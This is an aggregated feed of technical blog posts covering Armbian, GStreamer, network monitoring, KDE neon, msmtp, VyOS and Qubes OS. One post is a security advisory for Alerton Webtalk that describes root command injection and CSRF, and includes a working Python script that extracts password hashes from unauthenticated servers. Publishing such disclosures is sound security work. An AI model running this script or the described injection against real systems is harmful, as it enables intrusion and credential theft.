Using this methodology during an ordinary project allows us to perform the segmentation of the 3D model directly in the field (within the software Cloud Compare), dividing each layer of palimpsestic documentation (we spoke about this problem during our presentation at the CHNT conference 2016). This solution avoids long post-processing operations and is ideal for saving time and money in low-budget archaeological investigations. For this reason we are evaluating the possibility of including ROS (Robot Operating System) in ArcheOS Hypatia.
I hope to bring you good news soon about the release of the next version of ArcheOS. In the meantime, stay tuned to follow our research in testing new Open Source and Free Software. As always, if you want to help with development, just contact us on one of our channels: Facebook, YouTube or Blogger.
Have a nice day! 

27 April, 2017 11:50AM by Luca Bezzi (noreply@blogger.com)

hackergotchi for Ubuntu developers

Ubuntu developers

David Tomaschik: Security Issues in Alerton Webtalk (Auth Bypass, RCE)


Vulnerabilities were identified in the Alerton Webtalk Software supplied by Alerton. This software is used for the management of building automation systems. These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive. Alerton has responded that Webtalk is EOL and past the end of its support period. Customers should move to newer products available from Alerton. Thanks to Alerton for prompt replies in communicating with us about these issues.

Versions 2.5 and 3.3 were both confirmed to be affected by these issues.

(This blog post is a duplicate of the advisory I sent to the full-disclosure mailing list.)

Webtalk-01 - Password Hashes Accessible to Unauthenticated Users

Severity: High

Password hashes for all of the users configured in Alerton Webtalk are accessible via a file in the document root of the ‘webtalk’ user. The location of this file is configuration dependent, however the configuration file is accessible as well (at a static location, /~webtalk/webtalk.ini). The password database is a sqlite3 database whose name is based on the bacnet rep and job entries from the ini file.

A python proof of concept to reproduce this issue is in an appendix.

Recommendation: Do not store sensitive data within areas being served by the webserver.

Webtalk-02 - Command Injection for Authenticated Webtalk Users

Severity: High

Any user granted the “configure webtalk” permission can execute commands as the root user on the underlying server. There appears to be some effort of filtering command strings (such as rejecting commands containing pipes and redirection operators) but this is inadequate. Using this vulnerability, an attacker can add an SSH key to the root user’s authorized_keys file.

Host: test-host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: NID=...; _SID_=...; OGPC=...:
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Date: Mon, 23 Jan 2017 20:34:26 GMT
Server: Apache
cache-control: no-cache
Set-Cookie: _SID_=...; Path=/;
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2801

uid=0(root) gid=500(webtalk) groups=500(webtalk)

Recommendation: User input should not be passed to shell commands. If this cannot be avoided, the input must be properly escaped. Consider using one of the functions from the subprocess module without the shell=True parameter.
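To illustrate the recommendation, here is a minimal sketch (not Webtalk's actual code) of the difference an argument vector makes: shell metacharacters in user input are passed through as inert data rather than interpreted.

```python
import subprocess

def run_safely(cmd, user_arg):
    # The user-controlled value is a single argv element; no shell ever
    # parses it, so pipes, semicolons and $(...) have no effect.
    return subprocess.run([cmd, user_arg],
                          capture_output=True, text=True).stdout

# The injection payload comes back as literal text instead of executing:
print(run_safely("echo", "hello; rm -rf /"))
```

Compare this with string interpolation into a `shell=True` command, where filtering a few metacharacters (as Webtalk attempts) is never enough.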

Webtalk-03 - Cross-Site Request Forgery

Severity: High

The entire Webtalk administrative interface lacks any controls against Cross-Site Request Forgery. This allows an attacker to execute administrative changes without access to valid credentials. Combined with the above vulnerability, this allows an attacker to gain root access without any credentials.

Recommendation: Implement CSRF tokens on all state-changing actions.
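A common implementation of that recommendation binds a secret-keyed token to the user's session; this is a generic sketch (names are illustrative, not Webtalk's API):

```python
import hashlib
import hmac
import secrets

# Server-side secret; in practice persisted and rotated, here just generated.
SECRET_KEY = secrets.token_bytes(32)

def csrf_token(session_id):
    # Bind the token to the session so it cannot be replayed across users.
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def verify_csrf(session_id, token):
    # Constant-time comparison avoids timing side channels.
    return hmac.compare_digest(csrf_token(session_id), token)
```

Every state-changing form or request would embed the token, and the server would reject requests whose token fails `verify_csrf`.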

Webtalk-04 - Insecure Credential Hashing

Severity: Moderate

Password hashes in the userprofile.db database are computed by concatenating the password with the username (e.g., PASSUSER) and applying a plain MD5 hash. No salting or iterative hashing is performed. This does not follow password-hashing best practices and makes offline attacks highly practical.
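As a sketch of why this is dangerous, the scheme can be reproduced in a few lines, and a dictionary attack then needs only one fast MD5 computation per guess (the usernames and passwords here are made up):

```python
import hashlib

def webtalk_style_hash(password, username):
    # Unsalted, single-round MD5 over password+username, as described above.
    return hashlib.md5((password + username).encode()).hexdigest()

# With the hash database from Webtalk-01 in hand, cracking is trivial:
stolen = webtalk_style_hash("hunter2", "ADMIN")
for guess in ("letmein", "password", "hunter2"):
    if webtalk_style_hash(guess, "ADMIN") == stolen:
        print("cracked:", guess)
```

Modern hardware computes billions of MD5 hashes per second, which is exactly what salted, iterated schemes like scrypt or bcrypt are designed to prevent.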

Recommendation: Use scrypt, bcrypt, or argon2 for storing password hashes.

Webtalk-05 - Login Flow Defeats Password Hashing

Severity: Moderate

Password hashing is performed on the client side, allowing for the replay of password hashes from Webtalk-01. While this only works on the mobile login interface (“PDA” interface, /~webtalk/pda/pda_login.psp), the resulting session is able to access all resources and is functionally equivalent to a login through the Java-based login flow.

Recommendation: Perform hashing on the server side and use TLS to protect secrets in transit.


  • 2017/01/?? - Issues Discovered
  • 2017/01/26 - Issues Reported to security () honeywell com
  • 2017/01/30 - Initial response from Alerton confirming receipt.
  • 2017/02/04 - Alerton reports Webtalk is EOL and issues will not be fixed.
  • 2017/04/26 - This disclosure


These issues were discovered by David Tomaschik of the Google ISA Assessments team.

Appendix A: Script to Extract Hashes

import requests
import sys
import ConfigParser
import StringIO
import sqlite3
import tempfile
import os

def get_webtalk_ini(base_url):
    """Get the webtalk.ini file and parse it."""
    url = '%s/~webtalk/webtalk.ini' % base_url
    r = requests.get(url)
    if r.status_code != 200:
        raise RuntimeError('Unable to get webtalk.ini: %s' % url)
    buf = StringIO.StringIO(r.text)
    parser = ConfigParser.RawConfigParser()
    parser.readfp(buf)  # actually parse the downloaded INI data
    return parser

def get_db_path(base_url, config):
    rep = config.get('bacnet', 'rep')
    job = config.get('bacnet', 'job')
    url = '%s/~webtalk/bts/%s/%s/userprofile.db'
    return url % (base_url, rep, job)

def load_db(url):
    """Load and read the db."""
    r = requests.get(url)
    if r.status_code != 200:
        raise RuntimeError('Unable to get %s.' % url)
    tmpfd, tmpname = tempfile.mkstemp(suffix='.db')
    tmpf = os.fdopen(tmpfd, 'wb')
    tmpf.write(r.content)  # write the downloaded sqlite database to disk
    tmpf.close()
    con = sqlite3.connect(tmpname)
    cur = con.cursor()
    cur.execute("SELECT UserID, UserPassword FROM tblPassword")
    results = cur.fetchall()
    return results

def users_for_server(base_url):
    if '://' not in base_url:
        base_url = 'http://%s' % base_url
    ini = get_webtalk_ini(base_url)
    db_path = get_db_path(base_url, ini)
    return load_db(db_path)

if __name__ == '__main__':
    for host in sys.argv[1:]:
        try:
            users = users_for_server(host)
        except Exception as ex:
            sys.stderr.write('%s\n' % str(ex))
            continue
        for u in users:
            print '%s:%s' % (u[0], u[1])

27 April, 2017 07:00AM

April 26, 2017

hackergotchi for ARMBIAN



Ubuntu server – legacy kernel
Command line interface – server usage scenarios.


Ubuntu server – mainline kernel
Command line interface – server usage scenarios.



Known issues

Legacy kernel images (all boards) (default branch)

  • Arm64 browsers (Firefox, Chromium, Iceweasel) may crash frequently. Armhf versions of these browsers should be used instead (Iceweasel and Firefox preinstalled in desktop images should be of the right architecture out of the box)
  • HDMI output supports only limited number of predefined resolutions
  • Hardware accelerated video decoding supports only limited number of video formats

Board: Pine64/Pine64+

  • Gigabit Ethernet performance: confirmed as a hardware issue on some boards, though the legacy kernel received a workaround that may help in some cases.
  • Gigabit Ethernet performance: setting TX/RX delays manually in /boot/armbianEnv may improve performance on some boards. Refer to this github issue for the details.


Quick start | Documentation


Make sure you have a good & reliable SD card and a proper power supply. Archives can be uncompressed with 7-Zip on Windows, Keka on OS X and 7z on Linux (apt-get install p7zip-full). RAW images can be written with Etcher (all OS).


Insert the SD card into a slot and power the board. The first boot takes around 3 minutes; the board might then reboot, and you will need to wait another minute to log in. This delay is because the system creates a 128 MB emergency SWAP file and expands the SD card to its full capacity. After that, a worst-case boot (with DHCP) takes up to 35 seconds.


Login as root on HDMI / serial console or via SSH and use password 1234. You will be prompted to change this password at first login. Next you will be asked to create a normal user account that is sudo enabled (beware of default QWERTY keyboard settings at this stage).

26 April, 2017 10:12PM by igorpecovnik

Cumulus Linux

Data center network monitoring best practices part 1: Metrics and alerts

One of the least loved areas of any data center network is monitoring. This is ironic because at its core, the network has two goals: 1) Get packets from A to B 2) Make sure packets got from A to B. It is not uncommon in the deployments I’ve seen for the monitoring budget to be effectively $0, and generally, an organization’s budget also reflects their priorities. Despite spending thousands, or even hundreds of thousands, of dollars on networking equipment to facilitate goal #1 from above, there is often little money, thought and time spent in pursuit of Goal #2. In the next several paragraphs I’ll go into some basic data center network monitoring best practices that will work with any budget.

It is not hard to see why monitoring the data center network can be a daunting task. Monitoring your network, just like designing your network, takes a conscious plan of action. Tooling in the monitoring space today is highly fragmented, with more than 100 "best of breed" tools that each accommodate a specific use case. Just evaluating all the tools would be a full-time job. A recent Big Panda report and their video overview of it (38 mins) are quite enlightening. They draw some interesting conclusions from the 1700+ IT respondents:

  • 78% said obtaining budget for monitoring tools is a challenge
  • 79% said reducing the noise from all the tools is a challenge

The main takeaway here is that a well-thought out monitoring plan, using network monitoring best practices, implemented with modern open-source tooling can alleviate both of these issues.

Setting a monitoring strategy

Before we talk about tooling, we need to set a strategy for ourselves. There are two fields to be considered when setting a strategy:

  • Metrics
  • Alerts

Metrics are used for trend analysis and can be linked to alerts when crossing a threshold. Alerts can be triggered off multiple sources, including events, logs or metric thresholds.

Identifying your metrics

The right monitoring strategy requires the team to identify which metrics are important for your business. Metrics can take many forms but generally a metric is some quantifiable measure that is used to track and assess the status of a specific infrastructure component or application. Typically these metrics are collected and compared continually over time.

Examples of low-level metrics include bytes on an interface, CPU utilization on the switch or total number of routes installed in the routing table. But they could be even more high-level such as the number of requests to an application per minute or the amount of time required by the application to service each client request.
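Counter-style metrics such as bytes on an interface are cumulative totals, so trend analysis usually works on rates derived from successive samples. A minimal sketch (illustrative only):

```python
def rate_per_second(prev, curr, interval_s):
    # Two readings of a monotonically increasing counter -> average rate.
    # Real collectors must also handle counter wrap/reset (curr < prev).
    return (curr - prev) / interval_s

# 1,500,000 bytes seen over a 30 s polling interval -> 50 kB/s
print(rate_per_second(10_000_000, 11_500_000, 30))  # 50000.0
```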

For a non-exhaustive example of different low-level metrics that can be monitored with Cumulus Networks check out our “Monitoring Best Practices” documentation.

The challenge with a good monitoring strategy is to identify and monitor just the metrics that are important to reduce the overhead going into your monitoring tooling and ultimately the amount of information that needs to be stored, trended and evaluated by your team.

Taking action on metrics

Once your team has decided on the right metrics for your organization, the question becomes what to do with the collected metric data. Some metrics only make sense for long-term trending; others have a more immediate impact on network performance and require immediate attention from team members. These time-sensitive metrics call for a different class of monitoring tooling: alerting.

In the same way that the team needs to decide on the right metrics to monitor there needs to be some thought given to what alerts should be generated from these metrics. Do I really want an alert if an interface that faces a desktop computer goes down or do I only care if the uplink fails?

Thoughtful alerting is the apex of a good monitoring design because it allows the monitoring system to actually provide direct value to your operations staff. The team should only get alerts for things that need immediate action. Because 79% of folks say they are overwhelmed by noise from their monitoring tools there should be no false positives. False positives desensitize the team from listening to the monitoring system over time.

It makes sense to take a minimalist approach here: start with no alerts and add only those the team directly needs to be aware of. You may find that metrics need to be added to support the alerts needed by the team.
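One cheap way to cut the false positives mentioned above is to require a threshold breach to be sustained before alerting, so one-off spikes never page anyone. A generic sketch, not tied to any particular monitoring tool:

```python
def alert_indices(samples, threshold, sustained=3):
    # Fire only when `sustained` consecutive samples exceed the threshold.
    fired, run = [], 0
    for i, value in enumerate(samples):
        run = run + 1 if value > threshold else 0
        if run == sustained:
            fired.append(i)
    return fired

cpu = [40, 95, 42, 96, 97, 98, 50]
print(alert_indices(cpu, 90))  # [5] -- only the sustained breach alerts
```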

In the next couple blog posts, we’ll dive into network monitoring best practices a bit deeper and explore both alerting and modern tooling in greater detail. Stay tuned for more!

The post Data center network monitoring best practices part 1: Metrics and alerts appeared first on Cumulus Networks Blog.

26 April, 2017 09:56PM by Eric Pulvino

hackergotchi for Ubuntu developers

Ubuntu developers

Sebastian Dröge: RTP for broadcasting-over-IP use-cases in GStreamer: PTP, RFC7273 for Ravenna, AES67, SMPTE 2022 & SMPTE 2110

It’s that time of year again where the broadcast industry gathers at the NAB show, which seems like a good time to me to revisit some frequently asked questions about GStreamer‘s support for various broadcasting-related standards.

Even more so as at this year’s NAB there seems to be a lot of hype about the new SMPTE 2110 standard, which defines how to transport and synchronize live media streams over IP networks, and which fortunately (unlike many other attempts) is based on previously existing open standards like RTP.

While SMPTE 2110 is the new kid on the block here, there are various other standards based on similar technologies. There’s for example AES67 by the Audio Engineering Society for audio-only, Ravenna which is very similar, the slightly older SMPTE 2022 and VSF TR3/4 by the Video Services Forum.

Other standards, like MXF for storage of media (which is supported by GStreamer since years), are also important in the broadcasting world, but let’s ignore these other use-cases here for now and focus on streaming live media.

Media Transport

All of these standards depend on RTP in one way or another, use PTP or similar services for synchronization and are either fully (as in the case of AES67/Ravenna) supported by GStreamer already or at least to a big part, with the missing parts being just some extensions to existing code.

There’s not really much to say here about the actual media transport as GStreamer has had solid support for RTP for a very long time and has a very flexible and feature-rich RTP stack that includes support for many optional extensions to RTP and is successfully used for broadcasting scenarios, real-time communication (e.g. WebRTC and SIP) and live-video streaming as required by security cameras for example.

Over the last months and years, many new features have been added to GStreamer’s RTP stack for various use-cases and the code was further optimized; thanks to all that, the amount of work needed for new standards based on RTP, like the aforementioned ones, is rather limited. For AES67, for example, no additional work was needed to support it.

The biggest open issue for the broadcasting-related standards currently is the need for further optimization of high-resolution, high-framerate video streaming. In these cases we currently run into performance problems due to the high number of packets per second, and some serious optimizations would be needed. However, there are already various ideas on how to improve this situation that are just waiting to be implemented.
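To get a feel for the packet rates involved, consider uncompressed 1080p60 video at 10-bit 4:2:2 (20 bits per pixel) carried in roughly 1400-byte RTP payloads. These are back-of-the-envelope numbers, not a SMPTE 2110 payload-format calculation:

```python
def rtp_packets_per_second(width, height, fps, bits_per_pixel,
                           payload_bytes=1400):
    # Raw video bandwidth divided into fixed-size RTP payloads.
    bytes_per_second = width * height * fps * bits_per_pixel / 8
    return bytes_per_second / payload_bytes

# ~2.5 Gbit/s of video -> on the order of 220k packets per second
print(round(rtp_packets_per_second(1920, 1080, 60, 20)))  # 222171
```

At hundreds of thousands of packets per second, per-packet overhead in the RTP stack dominates, which is why these optimizations matter.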


I previously already wrote about PTP in GStreamer, which is supported in GStreamer for synchronizing media and that support is now merged and has been included since the 1.8 release. In addition to that NTP is also supported now since 1.8.

In theory other clocks could also be used in some scenarios, like clocks based on a GPS receiver, but that’s less common and not yet supported by GStreamer. Nonetheless all the infrastructure for supporting arbitrary clocks exists, so adding these when needed is not going to be much work.

Clock Signalling

One major new feature that was added in the last year, for the 1.10 release of GStreamer, was support for RFC7273. While support for PTP in theory allows you to synchronize media properly if both sender and receiver are using the same clock, what was missing before is a way to signal what this specific clock exactly is and what offsets have to be applied. This is where RFC7273 becomes useful, and why it is used as part of many of the standards mentioned before. It defines a common interface for specifying this information in the SDP, which commonly is used to describe how to set up an RTP session.
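For illustration, an RFC 7273 clock source appears in the SDP as a ts-refclk attribute. Below is a minimal parser sketch for the PTP form of that attribute; the value format follows the RFC, but this is not GStreamer's actual parsing code:

```python
def parse_ptp_refclk(sdp_line):
    # RFC 7273 PTP form: "a=ts-refclk:ptp=<version>:<gmid>[:<domain>]"
    # e.g. "a=ts-refclk:ptp=IEEE1588-2008:39-A7-94-FF-FE-07-CB-D0:37"
    prefix = "a=ts-refclk:ptp="
    if not sdp_line.startswith(prefix):
        return None
    fields = sdp_line[len(prefix):].split(":")
    version, gmid = fields[0], fields[1]
    domain = int(fields[2]) if len(fields) > 2 else 0
    return {"version": version, "grandmaster": gmid, "domain": domain}

print(parse_ptp_refclk(
    "a=ts-refclk:ptp=IEEE1588-2008:39-A7-94-FF-FE-07-CB-D0:37"))
```

A receiver uses the grandmaster identity and domain to confirm it is locked to the same PTP clock as the sender before applying the signalled offsets.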

The support for that feature was merged for the 1.10 release and is readily available.

Help needed? Found bugs or missing features?

While the basics are all implemented in GStreamer, there are still various missing features for optional extensions of the aforementioned standards or even, in some cases, required parts of them. In addition, some optimizations may still be required, depending on your use-case.

If you run into any problems with the existing code, or need further features for the various standards implemented, just drop me a mail.

GStreamer is already used in the broadcasting world in various areas, but let’s together make sure that GStreamer can easily be used as a batteries-included solution for broadcasting use-cases too.

26 April, 2017 04:01PM


Einblicke von Martin Jordan in die digitale Transformation der Britischen Regierung

Kurzfristig gelang es dem Team E- und Open-Government der Stadt München, Martin Jordan für einen Vortrag im Direktorium der Stadt München zu gewinnen. Geplant war ein Erfahrungsaustausch über die elektronische Verwaltung an der Schnittstelle zwischen … Weiterlesen

Der Beitrag Einblicke von Martin Jordan in die digitale Transformation der Britischen Regierung erschien zuerst auf Münchner IT-Blog.

26 April, 2017 01:32PM by Stefan Döring

hackergotchi for Ubuntu developers

Ubuntu developers

Harald Sitter: KDE neon CMake Package Validation

In KDE neon‘s constant quest of raising the quality bar of KDE software and neon itself, I added a new tool to our set of quality assurance tools. CMake Package QA is meant to ensure that find_package() calls on CMake packages provided by config files (e.g. FooConfig.cmake files) do actually work.

The way this works is fairly simple. For just about every bit of KDE software we have packaged, we install the individual deb packages including dependencies one after the other and run a dummy CMakeLists.txt on any *Config.cmake file in that package.

As an example, we have libkproperty3-dev as a deb package. It contains KPropertyWidgetsConfig.cmake. We install the package and its dependencies, construct a dummy file, and run cmake on it during our cmake linting.

cmake_minimum_required(VERSION 3.0)
find_package(KPropertyWidgets REQUIRED)

This tests that running KPropertyWidgetsConfig.cmake works, ensuring that the cmake code itself is valid (bad syntax, missing includes, what have you…) and that our package is sound and including all dependencies it needs (to for example meet find_dependency macro calls).
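The dummy file can be generated mechanically from the config file's name. A sketch of that step (a hypothetical helper, not neon's actual tooling):

```python
def dummy_cmakelists(config_filename):
    # "KPropertyWidgetsConfig.cmake" -> find_package(KPropertyWidgets REQUIRED)
    suffix = "Config.cmake"
    assert config_filename.endswith(suffix)
    package = config_filename[:-len(suffix)]
    return ("cmake_minimum_required(VERSION 3.0)\n"
            "find_package(%s REQUIRED)\n" % package)

print(dummy_cmakelists("KPropertyWidgetsConfig.cmake"))
```

Running cmake on the generated file in a clean chroot with only the package under test (and its declared dependencies) installed is what surfaces missing dependencies.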

As it turns out libkproperty3-dev is of insufficient quality. What a shame.

26 April, 2017 01:03PM

hackergotchi for VyOS


Donations and other ways to support VyOS

Hello, community!

We have received many requests about how to donate, so we have decided to open this possibility to those who asked.

After all, everything you offer is direct support for the project, and we constantly need support of all types.

As was mentioned before, you can contribute in many ways:

But if you would like to contribute via donation you are welcome to do so!

Raised money will be used for project needs like:

  • Documentation development
  • Tutorials and training courses creation
  • Artwork creation
  • Travels of project maintainers to relevant events 
  • Event organization
  • Videos
  • Features development 
  • Popularization of VyOS
  • Servers
  • Lab
  • Software
  • Hardware

Of course, that is not a complete list of the project's needs, just the most visible ones.

You will find the most convenient ways to donate below.

If you need an invoice, please drop me an email or ping me on chat.

Thank you!

Bitcoin: 1PpUa61FytNSWhTbcVwZzfoE9u12mQ65Pe

PayPal Subscription

PayPal One time donation

26 April, 2017 12:44PM by Yuriy Andamasov

hackergotchi for Ubuntu developers

Ubuntu developers

Joe Barker: Configuring msmtp on Ubuntu 16.04

I previously wrote an article around configuring msmtp on Ubuntu 12.04, but as I hinted at in my previous post that sort of got lost when the upgrade of my host to Ubuntu 16.04 went somewhat awry. What follows is essentially the same post, with some slight updates for 16.04. As before, this assumes that you’re using Apache as the web server, but I’m sure it shouldn’t be too different if your web server of choice is something else.

I use msmtp for sending emails from this blog to notify me of comments and upgrades etc. Here I’m going to document how I configured it to send emails via a Google Apps account, although this should also work with a standard Gmail account too.

To begin, we need to install 3 packages:
sudo apt-get install msmtp msmtp-mt ca-certificates
Once these are installed, a default config is required. By default msmtp will look at /etc/msmtprc, so I created that using vim, though any text editor will do the trick. This file looked something like this:

# Set defaults.
defaults
# Enable or disable TLS/SSL encryption.
tls on
tls_starttls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
# Setup WP account's settings.
account <MSMTP_ACCOUNT_NAME>
host smtp.gmail.com
port 587
auth login
user <EMAIL_ADDRESS>
password <PASSWORD>
from <EMAIL_ADDRESS>
logfile /var/log/msmtp/msmtp.log

account default : <MSMTP_ACCOUNT_NAME>

Any of the uppercase items (i.e. <PASSWORD>) are things that need replacing specific to your configuration. The exception to that is the log file, which can of course be placed wherever you wish to log any msmtp activity/warnings/errors to.

Once that file is saved, we’ll update the permissions on the above configuration file — msmtp won’t run if the permissions on that file are too open — and create the directory for the log file.

sudo mkdir /var/log/msmtp
sudo chown -R www-data:adm /var/log/msmtp
sudo chmod 0600 /etc/msmtprc

Next I chose to configure logrotate for the msmtp logs, to make sure that the log files don’t get too large as well as keeping the log directory a little tidier. To do this, we create /etc/logrotate.d/msmtp and configure it with the following file. Note that this is optional, you may choose to not do this, or you may choose to configure the logs differently.

/var/log/msmtp/*.log {
    # rotate monthly, keeping 12 compressed archives
    rotate 12
    monthly
    compress
    missingok
    notifempty
}

Now that the logging is configured, we need to tell PHP to use msmtp by editing /etc/php/7.0/apache2/php.ini and updating the sendmail path from

sendmail_path =

to

sendmail_path = "/usr/bin/msmtp -C /etc/msmtprc -a <MSMTP_ACCOUNT_NAME> -t"
Here I did run into an issue where even though I specified the account name it wasn’t sending emails correctly when I tested it. This is why the line account default : <MSMTP_ACCOUNT_NAME> was placed at the end of the msmtp configuration file. To test the configuration, ensure that the PHP file has been saved and run sudo service apache2 restart, then run php -a and execute the following

mail ('personal@email.com', 'Test Subject', 'Test body text');

Any errors that occur at this point will be displayed in the output, so diagnosing problems after the test should be relatively easy. If all is successful, you should now be able to use PHP's sendmail (which at the very least WordPress uses) to send emails from your Ubuntu server using Gmail (or Google Apps).

I make no claims that this is the most secure configuration, so if you come across this and realise it’s grossly insecure or something is drastically wrong please let me know and I’ll update it accordingly.

26 April, 2017 09:32AM

Alan Pope: April Snapcraft Docs Day

Continuing Snapcraft Docs Days

In March we had our first Snapcraft Docs Day on the last Friday of the month. It was fun and successful so we're doing it again this Friday, 28th April 2017. Join us in #snapcraft on Rocket Chat and on the snapcraft forums

Flavour of the month

This month's theme is 'Flavours', specifically Ubuntu Flavours. We've worked hard to make the experience of using snapcraft to build snaps as easy as possible. Part of that work was to ensure it works as expected on all supported Ubuntu flavours. Many of us run stock Ubuntu and despite our best efforts, may not have caught certain edge cases only apparent on flavours.

If you're running an Ubuntu flavour, then we'd love to hear how we did. Do the tutorials we've written work as expected? Is the documentation clear, unambiguous and accurate? Can you successfully create a brand new snap and publish it to the store using snapcraft on your flavour of choice?

Soup of the day

On Friday we'd love to hear about your experiences of doing things like the following on an Ubuntu flavour:-

Happy Hour

On the subject of snapping other people's projects. Here's some tips we think you may find useful.

  • Look for new / interesting open source projects on github trending projects such as trending python projects or trending go projects, or perhaps recent show HN submissions.
  • Ask in #snapcraft on Rocket Chat if others have already started on a snap, to avoid duplication & collaborate.
  • Avoid snapping frameworks and libraries; focus instead on atomic tools, utilities and full applications
  • Start small. Perhaps choose command line or server-based applications, as they're often easier for the beginner than full fat graphical desktop applications.
  • Pick applications written in languages you're familiar with. Although not compulsory, it can help when debugging
  • Contribute upstream. Once you have a prototype or fully working snap, contribute the yaml to the upstream project, so they can incorporate it in their release process
  • Consider uploading the application to the store for wider testing, but be prepared to hand the application over to the upstream developer if they request it

Finally, if you're looking for inspiration, join us in #snapcraft on Rocket Chat and ask! We've all got our own pet projects we'd like to see snapped.

Food for thought

Repeated from last time, here's a handy reference of the projects we work on with their repos and bug trackers:-

Project        | Source               | Issue Tracker
Snapd          | Snapd on GitHub      | Snapd bugs on Launchpad
Snapcraft      | Snapcraft on GitHub  | Snapcraft bugs on Launchpad
Snapcraft Docs | Snappy-docs on GitHub | Snappy-docs issues on GitHub
Tutorials      | Tutorials on GitHub  | Tutorials issues on GitHub

26 April, 2017 08:40AM

hackergotchi for Qubes


Compromise recovery on Qubes OS

Occasionally fuckups happen, even with Qubes (although not as often as some think).

What should we – users or admins – do in such a situation? Patch, obviously. But is that really enough? What good is patching your system if it might have already been compromised a week earlier, before the patch was released, when an adversary may have learned of the bug and exploited it?

That’s an inconvenient question for many of us – computer security professionals – to answer. Usually we would mutter something about Raising the Bar(TM), the high costs of targeted attacks, attackers not wanting to burn 0-days, or only nation state actors being able to afford such attacks, and that in case one is on their list of targets, the game is over anyway and no point in fighting. Plus some classic cartoon.

While the above line of defense might work (temporarily), it really doesn’t provide for much comfort, long term, I think. We need better answers and better solutions. This post, together with a recently introduced feature in Qubes OS 3.2 and (upcoming) 4.0, is an attempt to offer such a solution.

We start with a relatively easy problem, namely recovery of one or more (potentially) compromised AppVMs. Then we tackle the significantly more serious problem of handling a (potentially) compromised system, including a subverted dom0, hypervisor, BIOS and all the other software. We discuss below how Qubes OS can help handle all these cases.

Digression about detecting compromises

But before we move on, I’d like to say a few words about detecting system compromises, be that compromises of VMs (which actually are also systems in themselves) or the whole physical system.

The inconvenient and somewhat embarrassing truth for us – the malware experts – is that there does not exist any reliable method to determine whether a given system is not compromised. True, there are a number of conditions that can warn us that the system is compromised, but there is no limit on the number of checks that a system must pass in order to be deemed “clean”.

This means that in many situations it might be reasonable to perform “compromise recovery” for a system or system(s), even though we might not have any explicit indication of a compromise. Instead, the only justification might be some gut feeling, some unusual “coincidence” just observed (e.g. sudden spectacular series of successes of our competitor), or knowledge about a fatal vulnerability that we just learnt could have been reliably used to attack our systems. Or maybe you left your laptop in a hotel room and various entrance indicators suggest somebody paid you a visit?

I’m writing this all to actually make two important points:

  1. As we don’t have reliable indicators when to initiate the recovery procedure, it’s desirable for the procedure to be as simple and cheap to perform as possible. Because we might want to do it often, and just in case.

  2. Instead of expecting the recovery procedure to reveal details of the compromise (and let us do attribution and catch the bad guys), we might want to shift our goals and expect something else: namely, that once we have performed it, we will start over from a clean system.

Handling AppVM compromises

Let’s discuss first how we can deal with a (potentially) compromised AppVM (or some system VM).

How might a VM become compromised? Perhaps because of some bug in a Web browser or email client, opening a maliciously prepared PDF file, installing some backdoored software, or a gazillion other potential issues that might lead to the compromise of an AppVM.

It’s worth reiterating here that the Qubes OS security model assumes AppVM compromises as something that will happen on a regular basis.

I believe that, even if all the sharpest vulnerability researchers could spend all their lives auditing all the application software we use, and finally identify all the relevant bugs, this process would never catch up with the pace at which new bugs are being added by application developers into new apps, or even into newer versions of the apps previously audited.

Additionally, I don’t believe that advances in so called “safe languages” or anti-exploitation technology could significantly change this landscape. These approaches, while admittedly effective in many situations, especially against memory-corruption-based vulnerabilities, cannot address other broad categories of software vulnerabilities, such as security bugs in application logic, nor stop malicious (or compromised) vendors from building backdoors intentionally into their software.

Reverting AppVM’s root image back to a clean known state

Qubes OS offers a very convenient mechanism to revert root filesystems of any AppVM back to a known good state. All the user needs to do is to restart the specific AppVM. This trick works thanks to the Qubes OS template mechanism.

It’s difficult to overestimate the convenience and simplicity of this mechanism. Something strange just happened while browsing the Web? PDF viewer crashed while opening an attachment? File manager (or the whole VM) crashed while navigating to some just-downloaded, ZIP-unpacked directory? Just reboot the AppVM! Even if you’re slow at clicking, need to shut down and restart a heavy application like a Web browser, and your CPU is of moderate speed, the whole operation will take about 30 seconds.

The pesky home directory

Reverting the root filesystem of the AppVM to a good known (trusted) state might be a neat trick, but for more sophisticated attacks, especially attacks targeting Qubes OS, it might not be enough.

This is because, besides the root filesystem, each AppVM has also what we call a “private” image (volume). This is where e.g. the content of the home directory (i.e. the user data) is stored. And for obvious reasons the home directory is something that needs to persist between AppVM restarts.

Unfortunately it’s not quite correct to say that the AppVM’s private image contains only “user data”. In reality it might also contain scripts and programs, including some that are auto-executed upon each AppVM start. Bash’s ~/.bashrc and ~/.bash_profile, or files in ~/.config/autostart/*.desktop, are prime examples, but there are many more, e.g. some configuration files in various Web browser profiles (such as prefs.js), as well as Qubes-specific configuration and customization scripts (found in the /rw/config/ directory). An attacker can use any of these, and probably many more, depending on which other applications the user regularly uses, to persist her code within a specific AppVM. Additionally, an attacker can potentially exploit bugs in any of the software that is always, or often, run in the AppVM, such as a bug in Nautilus (the file manager) or some PDF viewer.
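As a rough illustration of how many persistence hooks live in a home directory, a small audit script could enumerate some of the locations mentioned above. This is a hypothetical sketch, not a Qubes tool, and the path list is illustrative, far from exhaustive:

```python
import os

# Illustrative (far from exhaustive) persistence locations, relative
# to the AppVM's home directory on the private volume.
PERSISTENCE_PATHS = [
    ".bashrc",
    ".bash_profile",
    ".config/autostart",   # *.desktop files auto-started on login
]

def find_persistence_candidates(home):
    """Return files under `home` that match known persistence locations."""
    hits = []
    for rel in PERSISTENCE_PATHS:
        path = os.path.join(home, rel)
        if os.path.isfile(path):
            hits.append(path)
        elif os.path.isdir(path):
            for root, _dirs, files in os.walk(path):
                hits.extend(os.path.join(root, f) for f in files)
    return sorted(hits)
```

A real audit would also have to cover application-specific profiles (browsers, shells, editors), which is exactly why a complete cleaning script is hard to write.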

Qubes offers three mechanisms for dealing with this problem:

  1. It is possible to mount one VM’s private image as a volume to another AppVM. One can then run whatever malware scanner or investigative software in that other AppVM. This operation is indeed very easy to do:

    [joanna@dom0 ~]$ qvm-block -A --ro admin-ir dom0:/var/lib/qubes/appvms/personal/private.img
